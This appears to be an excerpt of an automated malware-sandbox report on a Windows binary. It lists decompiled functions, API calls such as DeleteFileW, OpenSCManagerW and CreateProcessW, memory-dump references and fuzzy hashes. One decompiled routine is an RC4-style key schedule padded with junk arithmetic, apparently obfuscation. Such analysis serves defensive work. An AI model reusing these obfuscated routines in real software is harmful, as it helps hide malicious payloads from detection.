							_t39 = GlobalAlloc(2, _t51); // executed
						}
						if(_t39 == 0) {
							_t16 = _t72 + 0x10; // 0xd61640
							_t72 =  *_t16;
							_t85 = _t72;
							if(_t72 != 0) {
								GlobalLock(GlobalHandle(_t72));
							}
							LeaveCriticalSection(_v8);
							_t39 = E1000A595(_t57, _t61, _t68, _t72, _t85);
						}
						_t40 = GlobalLock(_t39);
						_t18 = _t72 + 4; // 0x20
						_v12 = _t40;
						E10041630(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
						 *(_t72 + 4) = _t57;
						 *(_t72 + 0x10) = _v12;
					} else {
						_t10 = _t72 + 0x10; // 0xd61640
						_t53 =  *_t10 + 8;
						while(( *_t53 & 0x00000001) != 0) {
							_t68 = _t68 + 1;
							_t53 =  &(_t53[8]);
							if(_t68 < _t56) {
								continue;
							}
							break;
						}
						if(_t68 >= _t56) {
							goto L7;
						}
					}
				} else {
					_t5 = _t72 + 0x10; // 0xd61640
					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t25 = _t72 + 0xc; // 0x3
				if(_t68 >=  *_t25) {
					_t26 = _t68 + 1; // 0x4
					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
				}
				_t28 = _t72 + 0x10; // 0xd61640
				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
				_t32 = _t68 + 1; // 0x4
				 *(_t72 + 8) = _t32;
				LeaveCriticalSection(_v8);
				return _t68;
			}

0x10028894
0x10028899
0x1002889a
0x1002889d
0x1002889f
0x1002889f
0x100288a4
0x100288a7
0x100288ad
0x100288ad
0x100288b0
0x100288b0
0x100288b5
0x100288c4
0x100288c6
0x100288c9
0x100288e6
0x100288e6
0x100288e6
0x100288e9
0x100288ec
0x100288ee
0x10028906
0x1002890d
0x10028910
0x1002891e
0x10028924
0x10028929
0x100288f0
0x100288f3
0x100288f9
0x100288fd
0x100288fd
0x10028931
0x10028933
0x10028933
0x10028936
0x10028938
0x10028942
0x10028942
0x1002894b
0x10028951
0x10028951
0x10028957
0x1002895d
0x10028968
0x10028971
0x1002897c
0x1002897f
0x100288cb
0x100288cb
0x100288ce
0x100288d1
0x100288d6
0x100288d7
0x100288dc
0x00000000
0x00000000
0x00000000
0x100288dc
0x100288e0
0x00000000
0x00000000
0x100288e0
0x100288b7
0x100288b7
0x100288be
0x00000000
0x00000000
0x100288be
0x10028982
0x10028985
0x10028987
0x1002898a
0x1002898a
0x1002898d
0x10028996
0x10028999
0x1002899c
0x1002899f
0x100289ab

APIs

EnterCriticalSection.KERNEL32(10094594,00000000,?,?,10094578,10094578,?,10028BF7,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 100288A7
GlobalAlloc.KERNEL32(00000002,00000000,?,?,10094578,10094578,?,10028BF7,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 100288FD
GlobalHandle.KERNEL32 ref: 10028906
GlobalUnlock.KERNEL32(00000000,?,?,10094578,10094578,?,10028BF7,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10028910
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 10028929
GlobalHandle.KERNEL32 ref: 1002893B
GlobalLock.KERNEL32 ref: 10028942
LeaveCriticalSection.KERNEL32(?,?,?,10094578,10094578,?,10028BF7,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 1002894B
GlobalLock.KERNEL32 ref: 10028957
_memset.LIBCMT ref: 10028971
LeaveCriticalSection.KERNEL32(?), ref: 1002899F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 3bb79cec97757eaf94cd3061a3e9782405b79f9485ede9c3e6f1e1124e4d2ccf
Instruction ID: 6ce842bdb2dbc47a6442f499bc681a28ab7ebd6011868170e398b4be0631511a
Opcode Fuzzy Hash: 3bb79cec97757eaf94cd3061a3e9782405b79f9485ede9c3e6f1e1124e4d2ccf
Instruction Fuzzy Hash: 4731AD75601705AFE720CF64EC89A5ABBF9EF88300F458929F456D3651EB31FA84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 048DF790, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(8EFAAE11), ref: 048DF839

Strings

$-Y, xrefs: 048DF802
Lu, xrefs: 048DF7EB
Lu, xrefs: 048DF81A
", xrefs: 048DF7C8

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: $-Y$Lu$Lu$"
API String ID: 4033686569-1114282491
Opcode ID: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction ID: 99a00462f9a1712068e032fc7b23da267bec98a8fd82cb8558070291d355e5dc
Opcode Fuzzy Hash: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction Fuzzy Hash: 2F11F5B6C00208FBDF09DFE5CC4A8AEBBB5FB54318F108588E915AA250D3B59B649F51

Uniqueness

Uniqueness Score: -1.00%

Function 048DB0E5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,00970FC6,00000028), ref: 048DB1AF

Strings

?P}, xrefs: 048DB119
Mv%, xrefs: 048DB153

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHandleInformation
String ID: ?P}$Mv%
API String ID: 3935143524-2885159553
Opcode ID: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction ID: 0e7720ff151238a21b8c2a7a97ae06ebd6ed801e30e1b13cc66952798b91ea1c
Opcode Fuzzy Hash: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction Fuzzy Hash: C92147B2D0120DFFDF54DF98CD4AAAEBBB1FB14305F108188E915A6290D3B55B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 048D42E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 048D43AA

Strings

zAo+, xrefs: 048D4350

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: af1b2fa98c87e74edff4c55e7640b3cf48a8ec38a3da9ffedb45320446b702a5
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: B22148B1C00208BF9B08DF99D98A8EEBFB8FB44344F508199E515A7240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 048DFE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,048D5191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 048DFF4C

Strings

OMk, xrefs: 048DFEC1

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 162881898335ac65f7c91c7cfd11a4f1e7db8fec11610be39637563d0c98737c
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 9C1113B2C0021CABEB11EFA9D90A8EFBFB8EF44318F108188E91466211D3B55B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 10005430, Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005430(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _t50;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t68;
				void* _t78;
				signed int _t101;
				void* _t108;
				signed int _t115;
				signed int _t119;
				signed int _t122;
				signed int _t125;
				void* _t137;
				void* _t141;

				_v8 = 0;
				_v20 = 0;
				_t50 =  *0x1006f06c; // 0x26b0
				_t51 = E1003F999(_t78, _t108, _t137, _t50); // executed
				_v16 = _t51;
				_v9 = 0;
				_v8 = 0;
				while(1) {
					_t141 = _v8 -  *0x1006f06c; // 0x26b0
					if(_t141 >= 0) {
						break;
					}
					 *(_a4 + _v8) = _v8;
					_t51 = _v16 + _v8;
					 *_t51 =  *((intOrPtr*)(_a8 + _v8 % _a12));
					_v8 = _v8 + 1;
				}
				_v8 = 0;
				while(1) {
					__eflags = _v8 -  *0x1006f06c; // 0x26b0
					if(__eflags >= 0) {
						break;
					}
					_v20 = (( *(_a4 + _v8) & 0x000000ff) + _v20 +  *(_v16 + _v8)) %  *0x1006f06c;
					_t56 =  *0x100924c4; // 0x0
					_t115 =  *0x100924b8; // 0x0
					_t58 =  *0x100924b4; // 0x0
					_t119 =  *0x100924b8; // 0x0
					_t61 =  *0x100924b4; // 0x0
					_t122 =  *0x100924c4; // 0x0
					_t63 =  *0x100924b4; // 0x0
					_v9 =  *((intOrPtr*)(_a4 + _v8 - _t56 *  *0x100924c0 - _t115 *  *0x100924b4 *  *0x100924c4 *  *0x100924b4 +  *0x100924bc -  *0x100924c0 +  *0x100924bc - _t58 *  *0x100924bc *  *0x100924b4 +  *0x100924b8 - _t119 *  *0x100924c0 *  *0x100924b4 + _t61 *  *0x100924b8 - _t122 *  *0x100924c4 -  *0x100924bc - _t63 *  *0x100924bc));
					_t125 =  *0x100924b4; // 0x0
					 *(_a4 + _v8) =  *((intOrPtr*)(_a4 + _v20 -  *0x100924b4 +  *0x100924c4 +  *0x100924b4 + _t125 *  *0x100924bc));
					_t68 =  *0x100924c0; // 0x0
					_t101 =  *0x100924c0; // 0x0
					 *((char*)(_a4 + _v20 +  *0x100924b4 +  *0x100924c0 - _t68 *  *0x100924bc *  *0x100924bc - _t101 *  *0x100924c4 +  *0x100924b8)) = _v9;
					_t51 = _v8 + 1;
					__eflags = _t51;
					_v8 = _t51;
				}
				return _t51;
			}

0x10005436
0x1000543d
0x10005444
0x1000544a
0x10005452
0x10005455
0x10005459
0x1000546b
0x1000546e
0x10005474
0x00000000
0x00000000
0x1000547f
0x1000548c
0x10005495
0x10005468
0x10005468
0x10005499
0x100054ab
0x100054ae
0x100054b4
0x00000000
0x00000000
0x100054d9
0x100054dc
0x100054ed
0x1000551c
0x10005537
0x1000554d
0x1000555b
0x10005570
0x10005584
0x1000559c
0x100055b7
0x100055c8
0x100055dd
0x100055f8
0x100054a5
0x100054a5
0x100054a8
0x100054a8
0x10005603

APIs

_malloc.LIBCMT ref: 1000544A

Part of subcall function 1003F999: __FF_MSGBANNER.LIBCMT ref: 1003F9BC
Part of subcall function 1003F999: __NMSG_WRITE.LIBCMT ref: 1003F9C3
Part of subcall function 1003F999: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,10047746,00000000,00000001,00000000,?,1004649F,00000018,10068B88,0000000C,10046530), ref: 1003FA10

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: d5780cd4a4cb5934fffae89478c3fda4e8b90a5463d8fd07460d6ad959fb88bb
Instruction ID: 3417919a1e1e010a831adf4265fbac0abb0eeb4cb53698f3afd668ea103f334f
Opcode Fuzzy Hash: d5780cd4a4cb5934fffae89478c3fda4e8b90a5463d8fd07460d6ad959fb88bb
Instruction Fuzzy Hash: F6513035501164DFEB0CCF6CCAE1AADBBB6FB95304B15918AD44A9B366C334EA14CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10001780, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E10001780(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _t44;
				intOrPtr _t50;
				void* _t55;
				signed int _t81;

				_v24 = __ecx;
				_v20 =  *_v24 - 0x10;
				_v12 =  *((intOrPtr*)(_v20 + 4));
				_v28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v20)) + 0x10))))();
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *_v28))))(_a4, 1); // executed
				_v16 = _t44;
				if(_v16 == 0) {
					E100018F0();
				}
				if(_v12 >= _a4) {
					_v32 = _a4;
				} else {
					_v32 = _v12;
				}
				_v8 = _v32 + 1;
				E1003F525(_t55, _v16 + 0x10, _v16 + 0x10, _v8, _v20 + 0x10, _v8);
				_t81 = _v16;
				_t50 = _v12;
				 *((intOrPtr*)(_t81 + 4)) = _t50;
				asm("lock xadd [ecx], edx");
				if((_t81 | 0xffffffff) - 1 <= 0) {
					_t50 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v20)) + 4))))(_v20);
				}
				 *_v24 = _v16 + 0x10;
				return _t50;
			}

0x10001786
0x10001791
0x1000179a
0x100017ae
0x100017c1
0x100017c3
0x100017ca
0x100017cc
0x100017cc
0x100017d7
0x100017e4
0x100017d9
0x100017dc
0x100017dc
0x100017ed
0x10001806
0x1000180e
0x10001811
0x10001814
0x10001820
0x10001827
0x1000183c
0x1000183c
0x10001847
0x1000184c

APIs

_memcpy_s.LIBCMT ref: 10001806

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: 46180a423e9cb7a3a37730f0a9fc7bb4cd1590bd7e545405e5c39007832db4c7
Instruction ID: 8ca69318fabb8f6d41ef4fc21803ad85626a99033e3160773e42239db3b89452
Opcode Fuzzy Hash: 46180a423e9cb7a3a37730f0a9fc7bb4cd1590bd7e545405e5c39007832db4c7
Instruction Fuzzy Hash: 313197B8E0060ADFDB04DF98C8919AEB7B1FF89310F148698E915AB355D730AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 048E31D2, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 048E32BB

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: e9b695a0e952c98d7316272ce8ed67c9fe1a9280f88a9d76acc1bb77b8a67d66
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 58310572801248BBCF65DF96CD09CDFBFB5FB89704F108188F914A2220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 048D199D, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(D4FB5FE8,?,?,00000000,?,?,00000000), ref: 048D1A79

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 6968fed16a3f53bf860367e5afe77eb8469d8492980f0742170252f2f74438ef
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: C821E47280021DBBDF05DF95D8058DEBFB6EF49354F108588F914A6260D3B69A619F90

Uniqueness

Uniqueness Score: -1.00%

Function 048C2985, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 048C2A3E

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: 2d32589c31a518e9756e95118143b607ed0524f0a6844c1f7090e03fdbef3419
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: A8213672D00209BBDF18DFA9D84A8DEBFB5FB41714F108198E815A6210D3B4AB55DF91

Uniqueness

Uniqueness Score: -1.00%

Function 048DA1D9, Relevance: 1.6, APIs: 1, Instructions: 57serviceCOMMON

Download Yara Rule

APIs

OpenServiceW.ADVAPI32(0016E205,00000000,00000000), ref: 048DA2A5

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction ID: bccf38447e1434549947fdfec76ed86a73458aad5a78321c078174d22ac731f8
Opcode Fuzzy Hash: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction Fuzzy Hash: 472125B1C0020DEFCF04DFE9DA49AAEBBB5EB44304F108199E914A6260D7B19B649F90

Uniqueness

Uniqueness Score: -1.00%

Function 048D7708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 048D77B6

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: 659bb1c8491dc2ab4290cbb847f9cccc62aee396e85abc22f24ae125531b3c26
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: EA1137B2D00209BBDB08DFA8D9469AEBBB4FF44304F108589E814A7250D3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 048C4248, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 048C42F1

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: eee2a1e9e4684949f73288eb6c519cb5fdb774176f1cffdcd3047937b8d64393
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 851128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208189E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10028BA3, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10028BA3(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				long* _t24;
				intOrPtr _t25;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr _t33;

				_t27 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_push(4);
				E10041CAB(0x100532ce, __ebx, __edi, __esi);
				_t30 = __ecx;
				_t33 =  *((intOrPtr*)(_t31 + 8));
				_t34 = _t33 == 0;
				if(_t33 == 0) {
					L1:
					E1000A5CD(_t22, _t23, _t27, _t30, _t34);
				}
				if( *_t30 == 0) {
					_t23 =  *0x10094574; // 0x10094578
					if(_t23 != 0) {
						L5:
						_t19 = E10028894(_t23); // executed
						 *_t30 = _t19;
						if(_t19 == 0) {
							goto L1;
						}
					} else {
						 *((intOrPtr*)(_t31 - 0x10)) = 0x10094578;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t21 = E100289AC(0x10094578);
						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
						_t23 = _t21;
						 *0x10094574 = _t21;
						if(_t21 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t24 =  *0x10094574; // 0x10094578
				_t28 = E10028706(_t24,  *_t30);
				_t39 = _t28;
				if(_t28 == 0) {
					_t17 =  *((intOrPtr*)(_t31 + 8))();
					_t25 =  *0x10094574; // 0x10094578
					E10028A53(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
				}
				return E10041D83(_t28);
			}

0x10028ba3
0x10028ba3
0x10028ba3
0x10028ba3
0x10028baa
0x10028baf
0x10028bb3
0x10028bb9
0x10028bbb
0x10028bbd
0x10028bbd
0x10028bbd
0x10028bc5
0x10028bc7
0x10028bcf
0x10028bf2
0x10028bf2
0x10028bf7
0x10028bfb
0x00000000
0x00000000
0x10028bd1
0x10028bd6
0x10028bd9
0x10028bdd
0x10028be2
0x10028be6
0x10028be8
0x10028bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x10028bf0
0x10028bcf
0x10028bff
0x10028c0a
0x10028c0c
0x10028c0e
0x10028c10
0x10028c13
0x10028c1e
0x10028c1e
0x10028c2a

APIs

__EH_prolog3.LIBCMT ref: 10028BAA

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: f0f3ff9aa2df9040d23e3affd36a399cd1452eeebb35d6c070f6f3269a039812
Instruction ID: 82eec6486e507c8ab1fb0dcdeda1744c844bf4589cebadc81f8db871c6525739
Opcode Fuzzy Hash: f0f3ff9aa2df9040d23e3affd36a399cd1452eeebb35d6c070f6f3269a039812
Instruction Fuzzy Hash: A6019A7CA02A469BEB1ADF749841A2C36A1EB81290FA6413DF845CB291EF34DE40C700

Uniqueness

Uniqueness Score: -1.00%

Function 048DA566, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 048DA601

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 94b0ebbb8a0c04a31dc00ea796d0ed02a2edbc9f2f591e3f8d8a20e615b1f1c6
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: D51127B5C0030CFBCB18DFE8D8468AEBBB4EF44304F108688A855A2260D3B16B148F91

Uniqueness

Uniqueness Score: -1.00%

Function 10009A5A, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009A5A(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				void* __edi;
				intOrPtr* _t11;
				void* _t13;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t18 = _a4;
				_t17 = __ecx;
